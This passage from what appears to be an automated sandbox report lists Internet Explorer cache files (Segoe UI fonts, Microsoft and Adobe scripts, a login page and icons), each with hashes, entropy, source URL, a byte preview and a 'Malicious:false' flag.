                                                                                                                                                                                                              Preview: .w...v......................X.....LP#...B.............. ..........................".S.e.g.o.e. .U.I. .S.e.m.i.b.o.l.d.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2...".S.e.g.o.e. .U.I. .S.e.m.i.b.o.l.d........H.P..lb.7^......U.D.-..iu...:4P\..GLFM.Y.#?.;..-...~}_).z{.rmD.1".$.....{.t.....=...!cK...%.~.....g........j.9S....6. ..n..V.]pz...e.....#X...=,.p.F..6&.VR...k$~J..n....7.......K.8..T.....x..J......#.J.XaQ.Q%_{3..xr.... 0Dm...k..Ep..........>..?Pk!KB..C...Q.q..1=6<,.S.F.&B..J.....ya2b."S.......6.2.......H......*..09A...Tb/.&.d..#.E.:.E.(..I5.M..444d.1........K..l...l.O..VBb...:..:b..Mh.'=4.d/..o.k.mMm........bx..!..S.@E.....>@:..k.JCas..7."..uG3hR.h..w..8W>.4.........pX....J..a....}.Y......(>H^=.`=.mg*.!.....w'...J.<.ob..3A .../.....5%.'....XS0a......I.Ia....a...=..g..........{V1+.."_)7$2 O..!bb.=..|.s.1..2qm..#.O......+E(I..1....EgQ.....E)R.m.?.8.q...J.G.@!f..n.F.r#..(..2p.?.9.8..?.d]..s..0.9.f..A...r.iq....x.g.aO....S.....R0i..BT.yl.".<k...:&Ja.\.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\latest[2].eot
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Embedded OpenType (EOT), Segoe UI Light family
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):28315
                                                                                                                                                                                                              Entropy (8bit):7.9724193003797
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:+R0Z7+bHAtrQ1yBFbgqLct7rJhhPLLkHsrvSzaJu4mI3n5o+MmKCxDg6iT7jdVye:+uNUAtE3phPLLFTiMu+pxCjHyGEQ9zL
                                                                                                                                                                                                              MD5:17DFE73CB9C64527F7248B0A24DB317D
                                                                                                                                                                                                              SHA1:345198B9239FCDAF038FB2D3A919E4724037DBAA
                                                                                                                                                                                                              SHA-256:AD75FB92B2EBCE6C37640F03E1AB96A752F388BCE60C877ADE4780B13839E8C4
                                                                                                                                                                                                              SHA-512:421B56D93E9BD5E4B4449DD0FCDEE8D531087FD484C91530AAF0A67EDEA33D5AC2F14A7F4966C528C0F130F17F26629FCAB9F8AB47E950CEB5B9F1A827EA0728
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot?
                                                                                                                                                                                                              Preview: .n...m............................LP#...B.............. ............................S.e.g.o.e. .U.I. .L.i.g.h.t.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2.....S.e.g.o.e. .U.I. .L.i.g.h.t..........K..e..66......U.D.-..iu...4P\..GLFM..C?.;..-...~|...P..\.(..)RI.....>.>..CE..SsV.jPR...H.......].R..&.n.hT.......x.....q .......wA[....F.........c.".......Zed..>.?...`..3...B..W....R....F.j....v..'?.5.k^........+..a...).._].x.#QSi.....|<t....k.;..Hv1.G...L$.9....5.t.:...V.Y.......|.@....B.....P`..2.Z.0....2`.FR.MF8.x....GP0..$:.....PYm.22..."S."1.*j[=.=.mR.*.......j....&.4...k..].1@..y$......"y..C..g7..k.B*...V..F\...G.m.jK ...O....b.Qlo...!.N.V....t.[..p.N..~@1d...YX.."....R_i.4.$j.P..U....u9...<..6..4%........9`.....S...N.Y..L..B$2\.E.vhe...n..h..5..Z..K?.H..S...2..=R..x.....EX.2......$."....It8..z.+.h ..$.2*T....}Z../....p..b0ae.qq.(-v1..E.!.l".a..p.).;..8t..7..^..W...4A.D\eOb$......b.NI.Pe.#$.O38....,....g..&|...B{...].....9..u.8..~Y...3.X..ff.,.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\latest[3].eot
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Embedded OpenType (EOT), Segoe UI family
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):35047
                                                                                                                                                                                                              Entropy (8bit):7.975792390307888
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:I6ibzTDpOGuAJ63YB9eSzDtQEspfAzyNyuBmOfAJYCM:/iPMYJ4GEAZoTyglcM
                                                                                                                                                                                                              MD5:CAD76E4816AF6890C9BFD02A6D1EA899
                                                                                                                                                                                                              SHA1:9EDC91541C31034FCE0D83AABBAAD4C314CD3D33
                                                                                                                                                                                                              SHA-256:D5794223D1A062E5DBE6C34C1994C8CE3792B24AFD5218D0644CB1F53DA4BE58
                                                                                                                                                                                                              SHA-512:24983A5856C2B4D8CBE2A4BD233A93B266A03D4218942E1D1733B33B65AB7A504AF0AC31DE2F1E69F6FF8CCD7A169CD4555539D34FFF8DE4CB8C98DB2DB2C863
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot?
                                                                                                                                                                                                              Preview: ...=.............................LP#...B.............. ............................S.e.g.o.e. .U.I.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2.....S.e.g.o.e. .U.I..........RV.z..;~......U.D.-..iu...N4P\..GLFM.Y.?.;..-...~~....Ox.M..".$.._..........g..sC*2..4W.....9AGc.[a..*.rCl,..@..U_..L...e..Ru.J.-.f..3........S`.A........K<;...n.Y...rIi......([...W...5k..........^K.G...U.@....2H..B.)N0w.....C..9...........#.l2,4..6y.3$b....K.wx...l.$E..?3.8.c...,x..t.wa.O....4.c...!..+.<EM...2T.>\..]4.A.H.;..G......W.:.?...Z".....e....8....84.L,.)0..y.Xdd.Pa.@.&.o(.I.q.yF...[.y.m(D...(....T......,A.;q.....w.$..C..a.. .Y.O?{..0...'1.;C.,.......W..Q-..'.5tD@9..U...E4e.&_...S.Y...\)b.s.rIR.....%..R..KU O..{.0(......^Q\^!.et...Kf%..K...}.1...S.{........3p..]...|Y...w..|JeS$..k.....>(8 .ZlV..N.).c...Z.K.\..q.....'S.j...........9...._..E.#s*'#......[......DJ^.L7../1...+U.qG........-..MM..q....L..c...^...:e....<h...:..`.jz..fb.Ha.....k.....e\)g..\."..M
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\launch-ENbcb8955aa2f84046af210e3226cdda04.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):67670
                                                                                                                                                                                                              Entropy (8bit):5.392899287279153
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Pe5bFwLcf989wq+PMwAdo3BGa0ISlEU0fRs7j1/qV4jDq:Pcyza0I7gB/qgO
                                                                                                                                                                                                              MD5:A53A162882280831BD6FADC32A9A0F23
                                                                                                                                                                                                              SHA1:C848B64D60CDC89BB687B6F5B0644936AD5DB3D8
                                                                                                                                                                                                              SHA-256:531BE32A178F3C26C4488353B72EA14577476C6CACC68BC5B26485A02AEF86C4
                                                                                                                                                                                                              SHA-512:03A67C52B15242F20FCBB564E91248C41B3D49087A6C5276A8F8AD224DECED06777C271E0A2E02AC52C1F256E0287C2C2C4711885B5C4C6286489FE40FFD18D7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/launch-ENbcb8955aa2f84046af210e3226cdda04.min.js?v=21042911200
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/launch-ENbcb8955aa2f84046af210e3226cdda04.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2021-05-07T15:01:43Z",environment:"production",turbineBuildDate:"2021-03-30T17:32:38Z",turbineVersion:"27.1.1"},dataElements:{"Gear - All Pages":{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return!!location.href.match(/gear\.xbox\.com\/?/gi)}}},"Bing Global Conditions":{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){var e=location.pathname,t=location.href;return!!e.match(/..\-..\/games\/(halo-wars-2|windows)\/?/gi)||!!t.match(/(www\.xbox\.com)\/[a-z]{2}-(us|ca|gb|fr)/gi)||!!t.match(/(xboxdesignlab\.xbox\.com)\/?/gi)}}},Ensighten:{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return null!=window.Bootstrapper}}},"JSLL Redtiger":{
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\linkedin[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):340
                                                                                                                                                                                                              Entropy (8bit):6.89748464898483
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhP1RnDspTAkgcqadiGjXMnThBRqDOLWlQ78GwKjFkYCaprI51Fu/Vp:6v/79G9AIqa4GrMnFql+7xjFmirIoz
                                                                                                                                                                                                              MD5:082196E344000587C008B768820283B6
                                                                                                                                                                                                              SHA1:A0A3A982764456CF74F75B47F7B5C517A628E586
                                                                                                                                                                                                              SHA-256:A91DC0F2545A1929E0C6A180C1728C433B23602A4C8AEC06552F5604525689CA
                                                                                                                                                                                                              SHA-512:FDBC29F6D3DF628007683DD6D8A8F3F0FA1CF743C72AC1F078F2C5FE37A360182B1CBA371F0F20B4F795F3BC3A1135103A2BCE190F69FA7ED8E31205CEF6C96A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/b23f9ba2/coreui.statics/images/social/linkedin.png
                                                                                                                                                                                                              Preview: .PNG........IHDR... ... ............tEXtSoftware.Adobe ImageReadyq.e<....IDATx.bd,..@K..@c0j..[..).o,..)........g/<.De.@L.2..9..Q?. .C..$..-.......K.[....p?x.]..K.Z.H..<m......L.@....7^}Y........./D.Vl..........`.:.:.i.9...tHz.V.mN.......@...........3.9.L<.`..'......../..g?D.T....oX.T..;V.h.6R-`.m.Z@1..0..Ec^..|.....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\meCore.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):101873
                                                                                                                                                                                                              Entropy (8bit):5.2509262251276025
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:I7uoUCePnnlneqFpJrJjsV72lzTP9/cTOhz/Eo7oYnOG:2WleMVLz/Eo7oYnOG
                                                                                                                                                                                                              MD5:387C103759BD1FCB45AFA9AB4E93F757
                                                                                                                                                                                                              SHA1:C03BC2A818A71F258861F672DD58AF8F951828F4
                                                                                                                                                                                                              SHA-256:990724F15389C3046AC58C6B463847D0B3771880463711478E30C18530F0CD2C
                                                                                                                                                                                                              SHA-512:930F2DD500F5BC95C82CAF1938DA8B7B866DB623EDB6826FDD6738F81F5D24EC5BA11617B4EA0153FA05C688602426A0C55138ECAA37DB7DCED13B08EC2A313B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mem.gfx.ms/scripts/me/MeControl/10.21123.2/en-US/meCore.min.js
                                                                                                                                                                                                              Preview: MeControlDefine("meCore",["exports","@mecontrol/web-inline","@mecontrol/web-boot"],function(t,f,h){"use strict";var r=function(t,e){return(r=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])})(t,e)};function e(t,e){function n(){this.constructor=t}r(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}var d=function(){return(d=Object.assign||function(t){for(var e,n=1,r=arguments.length;n<r;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)},s=function(){},i={},u=[],l=[];function v(t,e){var n,r,o,i,a=l;for(i=arguments.length;2<i--;)u.push(arguments[i]);for(e&&null!=e.children&&(u.length||u.push(e.children),delete e.children);u.length;)if((r=u.pop())&&void 0!==r.pop)for(i=r.length;i--;)u.push(r[i]);else"boolean"==typeof r&&(r=null),(o="function"!=typeof t)&&(null==r?r="":"number"==typeof r?r=String(r):"s
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\me[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10330
                                                                                                                                                                                                              Entropy (8bit):5.439165305114011
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:8A71n+7Xr+cHEzFQD6Ds35b05e58ITZSTXh7gk0yi4BgcmKuG8:8v7XrUJds35bd8cA4v
                                                                                                                                                                                                              MD5:10FF3224ABA28AEBD9B3EA6A6C53A68C
                                                                                                                                                                                                              SHA1:A888218C5482FFBE71B48FA2E0E661AF1678394F
                                                                                                                                                                                                              SHA-256:899D3C07330F7987CE5967E82555690F5C0F66C6AB07BF0857F1699F4EBC55F7
                                                                                                                                                                                                              SHA-512:553370E0EFFA45965E72D5299DC3FACB03D40E2E6281A0B6610658297EF0D093D46B939E06181FD59D1D137EBA76918613244F43241114719D47BC0EA3A42D24
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html> ServerInfo: BY1PEPF00001D6A 2021.04.29.10.43.41 LocVer:0 --> PreprocessInfo: azbldrun:AzBuildW2-Ha13, 2021-04-29T10:39:37.8613138-07:00 - Version: 16,0,29025,2 --> RequestLCID: 1033, Market:EN-US, PrefCountry: US, LangLCID: 1033, LangISO: EN --><html dir="ltr" lang="EN-US"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><base href="https://login.live.com"/><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=dae7218a659e420da3a5289e8358f7a4"/>Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.<br /><br />To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.</noscript><title>Windows Live ID</title><meta name="robots" content="none" /><meta name="PageID" content=""/><meta name="S
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\meversion[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):27711
                                                                                                                                                                                                              Entropy (8bit):5.241281453299336
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:2xYipPf+462FvZ6QyALeMJyr8ePnVcqMr6tAH6spyo:9ipn+462FvZ1y+Jyr803i6tAH6spyo
                                                                                                                                                                                                              MD5:CA0A98DEB7F6DAE8B062D2E0BC77D405
                                                                                                                                                                                                              SHA1:7DFD1ED4BE9AB1B2C443AF39F10898AE173348CA
                                                                                                                                                                                                              SHA-256:7F07FDB371E7097AF9FE75C8FE68F2DE53C6CE289D5C237FB66ED8373E2F6ED5
                                                                                                                                                                                                              SHA-512:B4222E9C2FE9EFFABDBC2D880EA966967FC1DB1A1E75C8E0F08DDDE104C0449B053BD1F6B28F37478786AC6964D2390FE1AEC151DC393970A3305A4995AD1F5F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mem.gfx.ms/meversion?partner=SMCConvergence&market=en-us&uhf=1
                                                                                                                                                                                                              Preview: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.21123.2","mkt":"en-US","ptn":"smcconvergence","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graph":false,"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/"};window.MeControl=window.MeControl||{};window.MeControl.Config={"ver":"10.21123.2","mkt":"en-US","ptn":"smcconvergence","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, Tr
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\meversion[2].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):27703
                                                                                                                                                                                                              Entropy (8bit):5.242000287869273
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:vwYipPf+462FvZ6QyALeMJyr8ePnVcqMr6tAH6spyo:Nipn+462FvZ1y+Jyr803i6tAH6spyo
                                                                                                                                                                                                              MD5:911935B323AC8E1BE32ADEC03FC8637A
                                                                                                                                                                                                              SHA1:D9535881FB6A5D0D688545B2AF23E6BC48A16853
                                                                                                                                                                                                              SHA-256:B877E4DA15BD60EF85FE5929460BE23731A8BD6BBA0CEC1C0E79C3CB74EABE20
                                                                                                                                                                                                              SHA-512:ED7A9B0FC65FB946E8A5C6DDA0C4F2A15FE434844DF534BDFFB072CFC08939AF82DF6C905A0521DB0EF2722AC4B216EAE0A42ADEEB0E54774EF3457AD20EFFFD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mem.gfx.ms/meversion?partner=MSHomePage&market=de-ch&uhf=1
                                                                                                                                                                                                              Preview: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.21123.2","mkt":"de-DE","ptn":"mshomepage","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graph":false,"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/"};window.MeControl=window.MeControl||{};window.MeControl.Config={"ver":"10.21123.2","mkt":"de-DE","ptn":"mshomepage","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedSce
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\meversion[3].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):27697
                                                                                                                                                                                                              Entropy (8bit):5.241636390506632
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:xkYipPf+462FvZ6QyALeMJyr8ePnVcqMr6tAH6spyo:Hipn+462FvZ1y+Jyr803i6tAH6spyo
                                                                                                                                                                                                              MD5:C64E115B9ABADC9F507E16AD640D40F7
                                                                                                                                                                                                              SHA1:BE2BF6BBE9F2875C8B3591D0724FC7913E37B89E
                                                                                                                                                                                                              SHA-256:A8005CD6EE847E719C01182A21D04D2BFD5AABAA873AE66F5C6CC8CFEB975DCD
                                                                                                                                                                                                              SHA-512:5F02351594AAE4F4B9ADE7575E3C09A3943BE30EDBC657895845A973006452955CD9681D004E4D14002367B7BDCBEBA9569FE69FCDA31BCCDF1FD2EB7934BF27
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mem.gfx.ms/meversion?partner=surface&market=en-us&uhf=1
                                                                                                                                                                                                              Preview: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.21123.2","mkt":"en-US","ptn":"surface","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graph":false,"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/"};window.MeControl=window.MeControl||{};window.MeControl.Config={"ver":"10.21123.2","mkt":"en-US","ptn":"surface","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario"
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\meversion[4].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):27703
                                                                                                                                                                                                              Entropy (8bit):5.24254857300168
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:5GYipPf+462FvZ6QyALeMJyr8ePnVcqMr6tAH6spyo:hipn+462FvZ1y+Jyr803i6tAH6spyo
                                                                                                                                                                                                              MD5:4003A20DDC1D342220975F3F9CD32425
                                                                                                                                                                                                              SHA1:B5F28742AD82C9BBF091A60EA543F729B20AF58E
                                                                                                                                                                                                              SHA-256:AC0BBDD3FD72BE2E2F7EE1207B0116CDF4A8D88DD70AA63E2CE4C9DA0CE26290
                                                                                                                                                                                                              SHA-512:2B8E43B1D5F70EF832EA0D24AFFC15102F5EC84D3052E39E7A521C9554146CF39A2949AF1364406263E2B58484B4D64660F4893C27E413661F490B0E0C7C1A4D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mem.gfx.ms/meversion?partner=XboxcomUHF&market=en-us&uhf=1
                                                                                                                                                                                                              Preview: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.21123.2","mkt":"en-US","ptn":"xboxcomuhf","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graph":false,"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/"};window.MeControl=window.MeControl||{};window.MeControl.Config={"ver":"10.21123.2","mkt":"en-US","ptn":"xboxcomuhf","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedSce
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\microsoft-account.64x64x32[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 300 x 300, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):7982
                                                                                                                                                                                                              Entropy (8bit):7.537343023458507
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:M7F8kn0aaiEaSHo036yoXXkIIACX9ALz7CkjJKuwA:MNn0aaifSI03PoX035XiPpjJrwA
                                                                                                                                                                                                              MD5:B9AD19743E3755B9D7714C94F867E19A
                                                                                                                                                                                                              SHA1:02A4F01D9F3918835B4C221D65046EC7FF63FA8C
                                                                                                                                                                                                              SHA-256:50242185DF659F1307204A75B4456FB96DA6C39608321F239409ED0027794511
                                                                                                                                                                                                              SHA-512:64AFD9D5C1EBCBA2C9C9D0BAAE0A3F3974ADC3479AF3D846780F808D7ACA01391628F80990078677C6655D8B1F865F00AF35BB025B08290B5735A47B290C4922
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socimages/appicons/microsoft-account.64x64x32.png
                                                                                                                                                                                                              Preview: .PNG........IHDR...,...,.....y}.u....pHYs...#...#.x.?v...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmp:CreateDate="2020-03-30T15:10:37-07:00" xmp:ModifyDate="2020-04-24T17:26:49-07:00" xmp:MetadataDate="2020-04-24T17:26:49-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:8e53648
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\microsoft-edge.64x64x32[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):9004
                                                                                                                                                                                                              Entropy (8bit):7.92779228468465
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:8IIHUCD4waJdCZc4ZSsc/LG0BPaWIZYB0JU5Rkf:i0wJZksoJhaW+YB025qf
                                                                                                                                                                                                              MD5:7CA7200CAA36D81900F695B8D0251064
                                                                                                                                                                                                              SHA1:EF965FE182A2171ED01B677AFD1809E8F8A235DE
                                                                                                                                                                                                              SHA-256:D38BAC5279E77140D6E622C8F4F4DE0CDA91806C32BB5ECBA007556E15504B81
                                                                                                                                                                                                              SHA-512:6EAA1534531CD809D6081135870886F0958ACAA8768FC5470A8DABFA2EFBE91E146F03F90DA069CA4DD9AF769A4E25729433F60B4E475E08ED1B571C33C1E8DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socimages/appicons/microsoft-edge.64x64x32.png
